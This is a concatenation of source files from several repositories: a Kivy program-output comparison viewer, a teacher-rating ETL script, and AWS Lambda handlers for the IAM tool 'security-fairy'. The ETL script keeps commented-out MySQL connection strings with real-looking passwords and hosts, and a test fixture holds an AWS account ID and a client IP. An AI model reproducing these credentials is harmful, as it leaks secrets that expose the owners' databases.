            self.plat_list.append(platform)
        self.plat_btn.bind(on_release = platforms.open)
        platforms.bind(on_select = lambda instance, x: setattr(self.plat_btn, 'text', x))
        test_filter = DropDown()
        for filter_type in ["None", "Matching", "MatchingPlat", "Matching+NoRes", "MatchingPlat+NoRes"]:
            btn = Button(text = filter_type, size_hint_y = None, height = 33)
            btn.bind(on_release = lambda btn: self.SetFilter(btn.text, test_filter))
            test_filter.add_widget(btn)
        self.filter_btn.bind(on_release = test_filter.open)
        test_filter.bind(on_select = lambda instance, x: setattr(self.filter_btn, 'text', x))
    def SetPlatform(self, platform, dropdown):
        """React to a platform pick: re-filter and refresh the result view."""
        dropdown.select(platform)
        self.prog_list = self.FilterProgs(self.filter_btn.text)
        if self.res_plt:
            self.prog_ipt.text = self.ProgNameAndLines(self.prog_list[0])
            self.curr_idx = 0
            self.ChangeResults()
        elif self.filter_btn.text != "Filter...":
            # First time both dropdowns are set: build the result widgets.
            self.prog_ipt.text = self.ProgNameAndLines(self.prog_list[0])
            self.SetResults()
            self.curr_idx = 0
    def SetFilter(self, filter_type, dropdown = None):
        """React to a filter pick (mirror image of SetPlatform)."""
        if dropdown:
            dropdown.select(filter_type)
        self.prog_list = self.FilterProgs(filter_type)
        if self.res_plt:
            self.prog_ipt.text = self.ProgNameAndLines(self.prog_list[0])
            self.curr_idx = 0
            self.ChangeResults()
        elif self.plat_btn.text != "Platform...":
            self.prog_ipt.text = self.ProgNameAndLines(self.prog_list[0])
            self.SetResults()
            self.curr_idx = 0
    def ProgNameAndLines(self, prog):
        """Format a program name with its line count, e.g. "p1.cl (120)"."""
        return prog + " (" + str(self.line_nos[prog]) + ")"
    def GoPrev(self):
        """Step to the previous program (wraps around at the start)."""
        if self.plat_btn.text == "Platform..." or self.filter_btn.text == "Filter...":
            return
        if self.curr_idx == 0:
            self.curr_idx = len(self.prog_list) - 1
        else:
            self.curr_idx -= 1
        self.prog_ipt.text = self.ProgNameAndLines(self.prog_list[self.curr_idx])
        self.ChangeResults()
    def GoNext(self):
        """Step to the next program (wraps around at the end)."""
        if self.plat_btn.text == "Platform..." or self.filter_btn.text == "Filter...":
            return
        if self.curr_idx == len(self.prog_list) - 1:
            self.curr_idx = 0
        else:
            self.curr_idx += 1
        self.prog_ipt.text = self.ProgNameAndLines(self.prog_list[self.curr_idx])
        self.ChangeResults()
    def GoProg(self, prog):
        """Jump directly to *prog* if it is in the current filtered list."""
        if not prog.endswith(".cl"):
            prog += ".cl"
        if not prog in self.prog_list:
            # Unknown program: reset the text box to the current one.
            self.prog_ipt.text = self.ProgNameAndLines(self.prog_list[self.curr_idx])
        else:
            self.curr_idx = self.prog_list.index(prog)
            self.prog_ipt.text = self.ProgNameAndLines(prog)
            self.ChangeResults()
    def FilterProgs(self, filter_type):
        """Return the program list for *filter_type* (see filterresults)."""
        if filter_type == "None" or self.plat_btn.text == "Platform...":
            return sorted(self.sample.keys())
        elif filter_type == "Matching" or (filter_type == "MatchingPlat" and self.res_plt in ["Sample", ""]):
            return filterresults.FilterMatching(self.sample, self.contents, self.plat_btn.text)
        elif filter_type == "MatchingPlat":
            return filterresults.FilterPlat(self.contents, self.plat_btn.text, self.res_plt)
        elif filter_type == "Matching+NoRes" or (filter_type == "MatchingPlat+NoRes" and self.res_plt in ["Sample", ""]):
            return filterresults.FilterMatching(self.sample, self.contents, self.plat_btn.text, True)
        elif filter_type == "MatchingPlat+NoRes":
            return filterresults.FilterPlat(self.contents, self.plat_btn.text, self.res_plt, True)
    def SetResults(self):
        """Build the result widgets the first time both dropdowns are set."""
        plat_select = DropDown()
        for platform in ["Sample"] + self.plat_list:
            btn = Button(text = platform, size_hint_y = None, height = 33)
            btn.bind(on_release = lambda btn: plat_select.select(btn.text))
            plat_select.add_widget(btn)
        plat_select_btn = Button(text = "Sample")
        plat_select_btn.bind(on_release = plat_select.open)
        plat_select.bind(on_select = lambda instance, x: self.ChangeResults(x))
        btn_layout = BoxLayout(orientation = "horizontal", size_hint_y = None, height = 33)
        lbl_compare = Label(markup = True, size_hint_x = 0.10)
        lbl_compare.text = self.GetComparison(self.plat_btn.text, plat_select_btn.text)
        diff_ipt = TextInput(text = self.sample[self.prog_list[self.curr_idx]], readonly = True)
        res_ipt = TextInput(text = self.contents[self.prog_list[self.curr_idx]][self.plat_btn.text], readonly = True)
        btn_layout_bot = BoxLayout(orientation = "horizontal", size_hint_y = None, height = 33)
        cnt_lbl = Label(text = str(self.curr_idx + 1) + " / " + str(len(self.prog_list)), size_hint_x = 0.5)
        gen_btn = Button(text = "Output HTML", size_hint_x = 0.25)
        # NOTE(review): OutputHTML is called with four arguments here but is
        # defined with three parameters in outputresults.py — confirm which
        # signature is intended.
        gen_btn.bind(on_release = lambda btn: outputresults.OutputHTML(self.plat_list, self.prog_list, self.sample, self.contents))
        back_btn = Button(text = "Back", size_hint_x = 0.25)
        back_btn.bind(on_release = lambda btn: self.SwitchScreen())
        btn_layout_bot.add_widget(cnt_lbl)
        btn_layout_bot.add_widget(gen_btn)
        btn_layout_bot.add_widget(back_btn)
        btn_layout.add_widget(lbl_compare)
        btn_layout.add_widget(plat_select_btn)
        self.result_view.add_widget(res_ipt)
        self.result_view.add_widget(btn_layout)
        self.result_view.add_widget(diff_ipt)
        self.result_view.add_widget(btn_layout_bot)
        # Remember the widgets so ChangeResults() can update them in place.
        self.res_plt = plat_select_btn.text
        self.res_ipt = res_ipt
        self.res_dff = diff_ipt
        self.res_cmp = lbl_compare
        self.res_slt = plat_select_btn
        self.prog_ipt.readonly = False
        self.cnt_lbl = cnt_lbl
    def ChangeResults(self, diff_plat = ""):
        """Refresh all result widgets for the current program/platforms."""
        if diff_plat:
            self.res_plt = diff_plat
            self.res_slt.text = diff_plat
            if self.filter_btn.text == "MatchingPlat":
                # The comparison platform is part of this filter: re-filter.
                self.prog_list = self.FilterProgs("MatchingPlat")
                self.prog_ipt.text = self.ProgNameAndLines(self.prog_list[0])
                self.curr_idx = 0
        self.res_cmp.text = self.GetComparison(self.plat_btn.text, self.res_plt)
        self.res_ipt.text = self.contents[self.prog_list[self.curr_idx]][self.plat_btn.text]
        if self.res_plt == "Sample":
            self.res_dff.text = self.sample[self.prog_list[self.curr_idx]]
        else:
            self.res_dff.text = self.contents[self.prog_list[self.curr_idx]][self.res_slt.text]
        self.cnt_lbl.text = str(self.curr_idx + 1) + " / " + str(len(self.prog_list))
    def GetComparison(self, curr_plat, diff_plat):
        """Return a coloured Match/Diff markup label comparing two sources."""
        prog_no = self.prog_list[self.curr_idx]
        left = self.contents[prog_no][curr_plat]
        if diff_plat == "Sample":
            right = self.sample[prog_no]
        else:
            right = self.contents[prog_no][diff_plat]
        if left == right:
            text = "[color=00ff00]Match[/color]"
        else:
            text = "[color=ff0000]Diff.[/color]"
        return text
    def SwitchScreen(self):
        """Go back to the directory Browser and drop this screen."""
        to_remove = self.manager.current_screen
        self.manager.current = "browser"
        self.manager.remove_widget(to_remove)
class ShowResultsApp(App):
    """Kivy application entry point: opens the directory Browser screen."""
    def build(self):
        # Fix the window size before the first screen is created.
        Config.set("graphics", "width", width)
        Config.set("graphics", "height", height)
        browser_instance = Browser(name="browser")
        browser_instance.dir_box.text = os.getcwd()
        browser_instance.file_chooser.path = os.getcwd()
        # NOTE(review): filters is assigned the *string* "os.path.isdir",
        # not the callable — confirm this filters to directories as intended.
        browser_instance.file_chooser.filters = "os.path.isdir"
        sm = ScreenManager()
        sm.add_widget(browser_instance)
        return sm
if __name__ == "__main__":
    # Launch the kivy application when run as a script.
    ShowResultsApp().run()
|
[
"/filterresults.py",
"/loadresults.py",
"/outputresults.py",
"/showresults.py"
] |
01662024622/teacher_ratting_aggregation
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import math
import os
import time
from datetime import datetime
from sqlalchemy import create_engine, text
from sqlalchemy.orm import sessionmaker
from teacher_rate import TeacherRate
# Scheduler state: set on first loop iteration, then advanced by
# delay_scheduel each cycle.
start_time = None
# config_time = int(os.environ["CONFIG_TIME_1578790800"])
config_time = 1578790800
#
# Seconds to sleep between readiness checks of the scheduler loop.
delay_time = int(os.environ["DELAY_TIME"])
# delay_time = 1
# int(os.environ["DELAY_TIME"])
# Source (extract) and destination (load) database URLs.
# NOTE(review): the commented-out examples below contain real-looking
# credentials — they should be purged from the repository history.
db_url_extract = str(os.environ["DB_URL_EXTRACT"])
# db_url_extract = 'mysql://root:1qazXSW@2019@sp1.dev.native.vn:3306/topicalms?charset=utf8&use_unicode=True'
db_url_load = str(os.environ["DB_URL_LOAD"])
# db_url_load = 'mysql://nvn_knowledge:ZKqC7vNK4HgOxnM7@118.70.223.165:3306/nvn_knowledge_v2?charset=utf8&use_unicode=True'
# Seconds between aggregation runs.
delay_scheduel = int(os.environ["DELAY_SCHEDUEL"])
# delay_scheduel = 6400
# 'SET @row_number := 0; ' + \
# Aggregation query: average of each teacher's 300 most recent valid
# ratings, using MySQL user variables to number rows per teacher.
sqldata = str(
    'SELECT teacher_id, FORMAT(AVG(points), 1) as rate_avg, MAX(num) AS number_rate ' + \
    'FROM( SELECT @row_number:= CASE ' + \
    'WHEN @customer_no = teacher_id ' + \
    'THEN @row_number + 1 ' + \
    'ELSE 1 ' + \
    'END ' + \
    'AS num, ' + \
    '@customer_no:= teacher_id teacher_id, ' + \
    'timecreated,points ' + \
    'FROM mdl_rating_class, ' + \
    '(SELECT @customer_no:=0,@row_number:=0) as t ' + \
    'WHERE teacher_id > 0 AND vote = 1 and points > 0 ' + \
    'ORDER BY teacher_id, id DESC ' + \
    ') as ali ' + \
    'WHERE num < 301 ' + \
    'GROUP BY teacher_id ')
def dict2TeacherRate(d):
    """Build a TeacherRate ORM row from a mapping of column name -> value.

    Args:
        d: mapping-like object (e.g. a SQLAlchemy result row) whose keys
           are TeacherRate attribute names.

    Returns:
        A new, unsaved TeacherRate instance.
    """
    row = TeacherRate()
    # items() walks keys and values in one pass (old code re-indexed d[k]).
    for key, value in d.items():
        setattr(row, key, value)
    return row
def extractLoad(db_url, list_data, var):
    """Load one batch of aggregated rating rows into the target database.

    Args:
        db_url: SQLAlchemy URL of the destination database.
        list_data: iterable of mapping-like rows (teacher_id, rate_avg,
            number_rate).
        var: batch index; the destination table is truncated only on the
            first batch (var == 0) so a full refresh replaces old data.
    """
    engine = create_engine(db_url, connect_args={'connect_timeout': 150}, echo=True)
    conn = engine.connect()
    try:
        if var == 0:
            # First batch of a refresh cycle: drop the previous snapshot.
            conn.execute(text('TRUNCATE teacher_rating_300;'))
        Session = sessionmaker(bind=conn)
        session = Session()
        try:
            inserted = 0
            # All rows in one batch share a single load timestamp.
            updated_time = str(datetime.now())
            for line in list_data:
                row = dict2TeacherRate(line)
                row.updated_time = updated_time
                session.add(row)
                inserted += 1
            if inserted > 0:
                session.commit()
        finally:
            # Close even when a row fails — the old code leaked the session
            # and connection on any exception.
            session.close()
    finally:
        conn.close()
# Scheduler loop: runs forever, waking every delay_time seconds until the
# next aligned run slot, then extracting, batching and loading the rating
# aggregation.
while True:
    if start_time is None:
        # First iteration: align the next run to the delay_scheduel grid
        # anchored at epoch 1578790800, then offset by config_time.
        start_time = (int((int(
            datetime.now().timestamp()) - 1578790800) / delay_scheduel)) * delay_scheduel + 1578790800 + config_time
    else:
        if start_time > int(datetime.now().timestamp()):
            # Not yet time for the next run: sleep and re-check.
            time.sleep(delay_time)
            continue
    # NOTE(review): this connection is opened every cycle and never
    # explicitly closed — confirm whether pooling makes that acceptable.
    engine = create_engine(db_url_extract, connect_args={'connect_timeout': 150}, echo=True)
    conn = engine.connect()
    sql = text(
        'SELECT COUNT(DISTINCT teacher_id) FROM mdl_rating_class ra JOIN mdl_tpebbb bb ON ra.room_id = bb.id AND ra.teacher_id>0 and points>0 AND vote=1')
    resultCount = conn.execute(sql)
    count = resultCount.fetchone()[0]
    print("have " + str(count) + " record from extract database")
    if count > 100:
        # Page through the aggregation query in batches of 1500 teachers.
        for var in list(range(int(math.ceil(count / 1500)))):
            sqllimit = text(sqldata + str('LIMIT ') + str(var * 1500) + str(',1500'))
            data = conn.execute(sqllimit)
            # print(data.keys())
            extractLoad(db_url_load, data, var)
    # Schedule the next run one full period later.
    start_time += delay_scheduel
--- FILE SEPARATOR ---
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from sqlalchemy import Column, Integer, BigInteger, TIMESTAMP
from sqlalchemy.dialects.mysql import DOUBLE
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
class TeacherRate(Base):
    """ORM model for one teacher's aggregated rating snapshot.

    Rows are written by main.py's extractLoad(); the table is truncated and
    repopulated on every refresh cycle.
    """
    __tablename__ = 'teacher_rating_300'
    # Surrogate primary key.
    id = Column('id', BigInteger, primary_key=True)
    # Teacher being rated.
    teacher_id = Column('teacher_id', Integer)
    # Average of the teacher's most recent ratings (formatted to 1 decimal).
    rate_avg = Column('rate_avg', DOUBLE)
    # How many ratings went into the average.
    number_rate = Column('number_rate', Integer)
    # When this snapshot was loaded.
    updated_time = Column('updated_time', TIMESTAMP)
--- FILE SEPARATOR ---
from teacher_rate import TeacherRate
from datetime import datetime
import math
import os
import requests as rq
import ast
from collections import namedtuple
import json
import math
from sqlalchemy import create_engine, text
from sqlalchemy.orm import sessionmaker
import csv
from teacher_rate import TeacherRate
from datetime import datetime
import time
# Smoke test: confirms the imports above resolve and prints the current time.
print (str(datetime.now()))
|
[
"/main.py",
"/teacher_rate.py",
"/test.py"
] |
01AT/security-fairy
|
"""
API Approval
Presents the revised policy created by Security Fairy,
and waits for the user to Approve or Cancel the policy
change.
"""
from __future__ import print_function
import string
import json
import boto3
import os
from setup_logger import create_logger
from aws_api_tools import get_domain_from_proxy_api_gateway
from aws_api_tools import api_response
from requests.utils import unquote
from botocore.exceptions import ProfileNotFound
try:
    # Local development: use the 'training' AWS profile when it exists.
    SESSION = boto3.session.Session(profile_name='training',
                                    region_name='us-east-1')
except ProfileNotFound as pnf:
    # In Lambda there is no shared credentials file: fall back to the
    # execution role's default session.
    SESSION = boto3.session.Session()
logger = create_logger(name='api_approve.py')
def lambda_handler(event, context):
    """ Executed by the Lambda service.

    Routes GET requests to the approval website and POST requests to the
    Step Function token task; any other verb gets an error response.
    """
    domain = get_domain_from_proxy_api_gateway(event)
    http_method = event['httpMethod']
    dispatch = {
        'GET': lambda: api_website(event, domain),
        'POST': lambda: token_task(event),
    }
    handler = dispatch.get(http_method)
    if handler is None:
        # Default API Response returns an error
        return api_response(headers={'Content-Type':'application/json'}, body='Method Unsupported.')
    logger.debug('%s Method' % http_method)
    return handler()
def token_task(event):
    """Resolve the pending Step Function task for this approval request.

    The {approval} path parameter decides whether the task is completed
    (send_task_success) or failed (send_task_failure).  The POSTed JSON
    body must carry the URL-encoded task token.

    Returns:
        A 200 API response whose body describes the outcome; the body is
        empty when the Step Functions call raised.
    """
    sfn_client = SESSION.client('stepfunctions')
    approved_or_denied = event["pathParameters"].get("approval", "deny")
    body = json.loads(event['body'])
    task_token = unquote(body['task_token'])
    response_string = ''
    try:
        if 'approve' in approved_or_denied:
            logger.info('approved')
            response = sfn_client.send_task_success(taskToken=task_token,
                                                    output=json.dumps(body))
            logger.info(response)
            response_string = "New policy applied. You will be redirected shortly."
        if 'deny' in approved_or_denied:
            response = sfn_client.send_task_failure(taskToken=task_token,
                                                    error='User Denial',
                                                    cause=json.dumps(body))
            response_string = "Revised Policy deleted."
    except Exception as e:
        # Best-effort boundary: keep the API responsive, but record the full
        # traceback (the old logger.info(e) dropped it).
        logger.exception(e)
    return api_response(statusCode=200, headers={'Content-Type':'application/json'}, body=response_string)
def api_website(event, domain):
    """Render the approval front-end for a Security Fairy execution.

    Looks up the proposed policy by the execution-id query parameter and
    substitutes it (plus entity ARN/name and API domain) into the HTML
    template below via string.Template.  On any lookup failure the page
    shows an error string in place of the policy.
    """
    # The old code created this client twice; once is enough.
    dynamodb_client = SESSION.client('dynamodb')
    entity_arn = ''
    entity_name = ''
    try:
        execution_id = event['queryStringParameters']['execution-id']
        logger.debug(execution_id)
        response_item = dynamodb_client.get_item( TableName=os.environ['dynamodb_table'],
                            Key={
                                "execution_id": {
                                    "S": "{execution_id}".format(execution_id=execution_id)
                                    }
                            })['Item']
        new_policy = response_item['new_policy']['S']
        entity_arn = response_item['entity_arn']['S']
        entity_name = entity_arn.split('/')[1]
        logger.info(response_item)
    except Exception as error:
        # Best-effort: expired or invalid ids fall through to a friendly
        # error string rendered where the policy would be.
        logger.info(error)
        new_policy = "Error: This executionId has either expired or is invalid."
    body = """
<html>
<body bgcolor=\"#E6E6FA\">
<head>
<!-- Latest compiled and minified CSS -->
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>
<style>
.code {
    max-height: 500px;
    width: 600px;
    overflow: scroll;
    text-align: left;
    margin-bottom: 20px;
}
</style>
<script>
function getUrlParameter(name) {
    name = name.replace(/[\[]/, '\\[').replace(/[\]]/, '\\]');
    var regex = new RegExp('[\\?&]' + name + '=([^&#]*)');
    var results = regex.exec(location.search);
    return results === null ? '' : decodeURIComponent(results[1].replace(/\+/g, ' '));
};
var dict = {};
var taskToken = getUrlParameter('task-token');
var executionId = getUrlParameter('execution-id');
dict['task_token']= taskToken;
dict['execution_id']=executionId;
function submitRequest(approval){
    $.ajax({
        type: 'POST',
        headers: {
                'Content-Type':'application/json',
                'Accept':'text/html'
        },
        url:'$domain'+approval,
        crossDomain: true,
        data: JSON.stringify(dict),
        dataType: 'text',
        success: function(responseData) {
            document.getElementById("output").innerHTML = responseData;
        },
        error: function (responseData) {
            alert('POST failed: '+ JSON.stringify(responseData));
        }
    });
};
function redirect(){
    var url = "https://console.aws.amazon.com/iam/home?region=us-east-1#/roles/$entity_name";
    document.location.href = url;
};
$(document).ready(function(){
    document.getElementById("output").innerHTML = JSON.stringify($new_policy, null, "\\t");
    $("#approve").click(function(){
        console.log("Approve button clicked");
        submitRequest("approve");
        setTimeout(redirect,4000);
    });
    $("#deny").click(function(){
        console.log("deny button clicked");
        submitRequest("deny");
    });
});
</script>
</head>
<body>
<center>
<title>IAM Security Fairy</title>
<h1><span class="glyphicon glyphicon-fire text-danger" ></span> IAM Security Fairy</h1>
<div class="code"><pre>$entity_arn</pre></div>
<div class="code"><pre id='output'></pre></div>
<button class="btn btn-primary" id='approve'>Apply</button>
<button class="btn btn-danger" id='deny'>Cancel</button>
</center>
</body>
</html>"""
    # safe_substitute leaves unknown $placeholders intact instead of raising.
    replace_dict = dict(new_policy=new_policy, domain=domain, entity_arn=entity_arn, entity_name=entity_name)
    return_body = string.Template(body).safe_substitute(replace_dict)
    return api_response(statusCode=200, body=return_body)
if __name__ == '__main__':
    # Local smoke test: a captured API Gateway proxy event (a GET to /deny
    # carrying a Step Functions task token and execution id) replayed through
    # the handler.  Values were recorded from a dev account/stage.
    EVENT = {
        u'body': u'{"task_token":"AAAAKgAAAAIAAAAAAAAAAeBS1qBvUAgyOizrFb5NdzMlMlS%2BqIKnNmqXDJlrEXcIrwwRvxrKGV65Rs1ar6zzx0tVhh%2BEzjhn2FKSTpsusDO3S6CUZU3LVfwhOcluxAJDlTPSujG4FYvgQxUI%2FnzChKRAVIIGKZywPPD6VpkBkKp19RuN6Bq6g0Krx2ASzfFbvS7mK%2F%2FMxfyn52MrIXAEy75xYnBSR5wtt4%2BuBUXWIoGsoQ8haKfsB2R3mnxykbDUNmM7TtnWULw4Z9V3LOfhwp0ZxzfzNXWpRMvY4Ifwu6VSHRgoRl%2FzVpcDXr3Eeeb4fLic30B56cWjI5qxpALfswEHyP%2FWPyXkpyAHmQUbxlygRzpZUmt84%2F7Ds%2FXr2GpRcrp7Hzpe2GiMymHgXYp8wgSzRZAV5R1fYaRPgSnGETUs37%2BGC8eIfgC8ER6JuXhy1xv6ugvO3vZ0rNd9FdylHzrQ4CtAM0yMagmEfOfibCQxjAFswIBd1E790dhe1I5eD9X8%2BTMt7CzYdSN0MOky3dn6uhIfNUxU5cs4jGg%2FzfrsEBW2fFmmxQ68phCL3AXgxoGO4LIs2mkLJzM%2BtbMmCA%3D%3D","execution_id":"d285e04c-21d9-4468-93d2-ba7b173c2292"}',
        u'resource': u'/{approval}',
        u'requestContext': {
            u'resourceId': u'ktk3jq',
            u'apiId': u'ezwzmmh526',
            u'resourcePath': u'/{approval}',
            u'httpMethod': u'GET',
            u'requestId': u'2938ad50-50a7-11e7-bff1-93579d44e732',
            u'path': u'/Prod/approve',
            u'accountId': u'281782457076',
            u'identity': {
                u'apiKey': u'',
                u'userArn': None,
                u'cognitoAuthenticationType': None,
                u'accessKey': None,
                u'caller': None,
                u'userAgent': u'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36',
                u'user': None,
                u'cognitoIdentityPoolId': None,
                u'cognitoIdentityId': None,
                u'cognitoAuthenticationProvider': None,
                u'sourceIp': u'71.219.116.20',
                u'accountId': None
            },
            u'stage': u'Prod'
        },
        # NOTE(review): queryStringParameters is None here, so the handler's
        # GET path will take its exception branch — confirm this is the
        # intended fixture.
        u'queryStringParameters': None,
        u'httpMethod': u'GET',
        u'pathParameters': {
            u'approval': u'deny'
        },
        u'headers': {
            u'origin': u'https://ezwzmmh526.execute-api.us-east-1.amazonaws.com',
            u'Via': u'2.0 3c6cd3705576f791e49d58b73a16e8f0.cloudfront.net (CloudFront)',
            u'Accept-Language': u'en-US,en;q=0.8',
            u'Accept-Encoding': u'gzip, deflate, br',
            u'CloudFront-Is-SmartTV-Viewer': u'false',
            u'CloudFront-Forwarded-Proto': u'https',
            u'X-Forwarded-For': u'71.219.116.20, 216.137.42.62',
            u'CloudFront-Viewer-Country': u'US',
            u'Accept': u'text/html',
            u'User-Agent': u'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36',
            u'X-Amzn-Trace-Id': u'Root=1-59409bf5-31a996a67ad3927c5c312295',
            u'dnt': u'1',
            u'Host': u'ezwzmmh526.execute-api.us-east-1.amazonaws.com',
            u'X-Forwarded-Proto': u'https',
            u'Referer': u'https://ezwzmmh526.execute-api.us-east-1.amazonaws.com/Prod/approve?execution-id=9487c326-23fc-46d6-a2c2-69b6342b5162&task-token=AAAAKgAAAAIAAAAAAAAAAbwck0ZXLox0l5UCsjE3iQN3iBJNAu9ZWh%2FElSrNKHdVP90ZxgrPZvFQZMnl%2BdcD4J9VdwieXvx2s6VBpQ1AsIrJLYM7y9D1bDRvrct34LA4YldibA7gw3dz5YmvScrCiLX8DLPT5BiKkpKtwN5pVXqlC0fZcSQ4Z2ZdSvAN%2Fawy6S678p5QyxsJlqe3pQpbIZfmQ4XjboqpLMIWSMDkYajtBuxMgtfyX879s5QHzCZ9d0B29WI3FV0PS07xMYrqn%2B2Nu%2F2l64JvKMMNBknJZiM2c92AQFZMFvOvMCHnxbtLqZjZpWTaW5Z3O0Cv5B91l6T7bZvk6Dp7QZ6fAdYlQw8S%2FYT0Vz6z%2FsMPDf3bxPfGJ9b4cjVHbLX0nK4BEvlAW%2FOEXJGGYG9X2V%2FgUoRMs%2FRwEenzvxi5raZPsHlCqOZzmuszC1H4duNQBaRjF2vzOY60wyOoP7%2FshrdfPvGKh9LMMUi%2Fir2y9W8hbCb6R1MZERE9yOIUlK%2Bc5NHZf64JnRvNG2tUF4efOjVIbZfLrayDEAgLqeOtlXSy7yOLxSjdmqcVKXmD2AdnLg2yi%2FHYyyUc3fQPZES6nPOMpuLz27E%3D',
            u'CloudFront-Is-Tablet-Viewer': u'false',
            u'X-Forwarded-Port': u'443',
            u'X-Amz-Cf-Id': u'ZVhtdhkgqjEmMBhWxew_9Xuq91gaPrxLIowzD0R0eBJgXzXj8Y6rfQ==',
            u'CloudFront-Is-Mobile-Viewer': u'false',
            u'content-type': u'application/json',
            u'CloudFront-Is-Desktop-Viewer': u'true'
        },
        u'stageVariables': None,
        u'path': u'/deny',
        u'isBase64Encoded': False
    }
    logger.info("Lambda Handler:")
    logger.info(lambda_handler(EVENT, {}))
--- FILE SEPARATOR ---
"""API Endpoint
Validates inputs to the Security Fairy tool,
then creates and executes the State Machine
which orchestrates the Security Fairy
Lambda functions.
"""
import json
import re
import os
import string
import boto3
from botocore.exceptions import ProfileNotFound
from aws_entity import AWSEntity
# Prefer the local 'training' profile on developer workstations; fall back
# to the default credential chain (e.g. the Lambda execution role) when the
# profile is absent.
try:
    SESSION = boto3.session.Session(profile_name='training', region_name='us-east-1')
except ProfileNotFound as pnf:
    SESSION = boto3.session.Session()
def lambda_handler(event, context):
    """
    Executed by the Lambda service.

    Routes GET requests to the input website and POST requests to the
    state-machine invocation; any other method yields a 500 payload.
    """
    fallback_payload = {
        'statusCode': 500,
        'headers': {
            'Content-Type': 'application/json'
        },
        'body': 'Security Fairy Internal Server Error.'
    }
    domain = get_domain(event)
    http_method = event['httpMethod']
    if http_method == 'GET':
        return api_website(event, domain)
    if http_method == 'POST':
        return post_response(event, domain)
    return fallback_payload
def post_response(event, domain):
    """Validate the POST body and start the Security Fairy state machine.

    Returns an API Gateway proxy payload; validation errors are reported in
    the body with a 200 status so the browser surfaces the message.
    """
    api_return_payload = {
        'statusCode': 500,
        'headers': {
            'Content-Type': 'application/json'
        },
        'body': 'Security Fairy Internal Server Error.'
    }
    print(event)
    try:
        inputs = validate_inputs(event)
        invoke_state_machine(inputs)
        api_return_payload['statusCode'] = 200
        api_return_payload['body'] = 'The auditing process can take up to 20 minutes. An email will be sent upon completion.'
    except Exception as error:
        print(error)
        api_return_payload['statusCode'] = 200
        api_return_payload['body'] = "Unsuccessful: {error}".format(error=error)
    # Bug fix: this was a Python 2 print *statement* ('print api_return_payload'),
    # a SyntaxError under Python 3; the rest of this file uses print().
    print(api_return_payload)
    return api_return_payload
def get_domain(event):
    """Reconstruct the base URL this request was served from.

    Handles API Gateway test invocations (no headers at all), raw
    execute-api URLs (which need the stage segment) and custom domains.
    """
    headers = event['headers']
    # Supports test invocations from API Gateway
    if headers is None:
        return "https://testinvocation/start"
    host = headers['Host']
    if 'amazonaws.com' not in host:
        # Custom domain: no stage segment in the public URL.
        return "https://{domain}{path}".format(domain=host, path=event['path'])
    return "https://{domain}/{stage}{path}".format(domain=host,
                                                   stage=event['requestContext']['stage'],
                                                   path=event['path'])
def invoke_state_machine(inputs):
    """Invoke the Security Fairy state machine with the validated inputs.

    NOTE(review): this definition is shadowed by a second
    invoke_state_machine later in this file — the later one wins at import
    time; consider deleting one of them.
    """
    # Bug fix: 'print json.dumps(inputs)' was Python 2 statement syntax,
    # a SyntaxError under Python 3.
    print(json.dumps(inputs))
    sfn_client = SESSION.client('stepfunctions')
    response = sfn_client.start_execution(stateMachineArn=os.environ['state_machine'],
                                          input=json.dumps(inputs))
    print(response)
def validate_inputs(event):
    """Parse the request body and normalise its fields.

    num_days is negated because downstream queries look backwards in time.
    """
    payload = json.loads(event['body'])
    window = validate_date_window(payload.get('num_days', 7))
    arn = validate_entity_arn(payload.get('entity_arn'))
    return {
        'num_days': -window,
        'entity_arn': arn
    }
def validate_date_window(days):
    """Return abs(days), enforcing the supported 1-30 day audit window.

    Raises:
        ValueError: when the window falls outside 1..30 inclusive.
    """
    window = abs(days)
    if window > 30 or window < 1:
        # Bug fix: 'print window' was Python 2 statement syntax, a
        # SyntaxError under Python 3.
        print(window)
        raise ValueError('Valid number of days is between 1 and 30 inclusive.')
    return window
def validate_entity_arn(entity_arn):
    """Validate an entity ARN and normalise it to assumed-role form.

    Roles are valid:   arn:aws:iam::842337631775:role/1S-Admins
                       arn:aws:sts::281782457076:assumed-role/1S-Admins/alex
    Users are invalid: arn:aws:iam::842337631775:user/aaron

    Raises:
        ValueError: for malformed ARNs, users, groups, or non-role entities.
    """
    try:
        arn = AWSEntity(entity_arn)
    except Exception:
        raise ValueError('Malformed ARN. Please enter a role ARN.')
    print(arn.entity_type)
    if 'user' in arn.entity_type:
        raise ValueError('Users not supported. Please enter a role ARN.')
    if 'group' in arn.entity_type:
        raise ValueError('Groups not supported. Please enter a role ARN.')
    if not arn.is_assumed_role() and not arn.is_role():
        raise ValueError('Invalid Resource ARN.')
    # Bug fix: raw string — '\d' and '\/' are invalid escape sequences in a
    # plain string literal (DeprecationWarning, error in future Pythons).
    # '\/' matches the same text as '/' so behaviour is unchanged.
    assumed_role_pattern = re.compile(r"arn:aws:sts::(\d{12})?:assumed-role/(.*)/(.*)")
    if not assumed_role_pattern.match(entity_arn):
        entity_arn = "arn:aws:sts::" + arn.get_account_number() + ":assumed-role/" + arn.get_entity_name()
    # Raises if the role does not actually exist in this account.
    SESSION.client('iam').get_role(RoleName=arn.get_entity_name())
    return entity_arn
def invoke_state_machine(inputs):
    """Start the Security Fairy state machine.

    NOTE: this overrides the earlier definition of the same name at
    import time.
    """
    serialized_inputs = json.dumps(inputs)
    print(serialized_inputs)
    response = SESSION.client('stepfunctions').start_execution(
        stateMachineArn=os.environ['state_machine'],
        input=serialized_inputs)
    print(response)
def api_website(event, domain):
    """Serve the Security Fairy input page (GET handler).

    Returns an API Gateway proxy response whose body is the HTML template
    below with $domain substituted; the page POSTs {entity_arn, num_days}
    back to the same API via jQuery.
    """
    body = """
            <html>
            <body bgcolor=\"#E6E6FA\">
            <head>
            <!-- Latest compiled and minified CSS -->
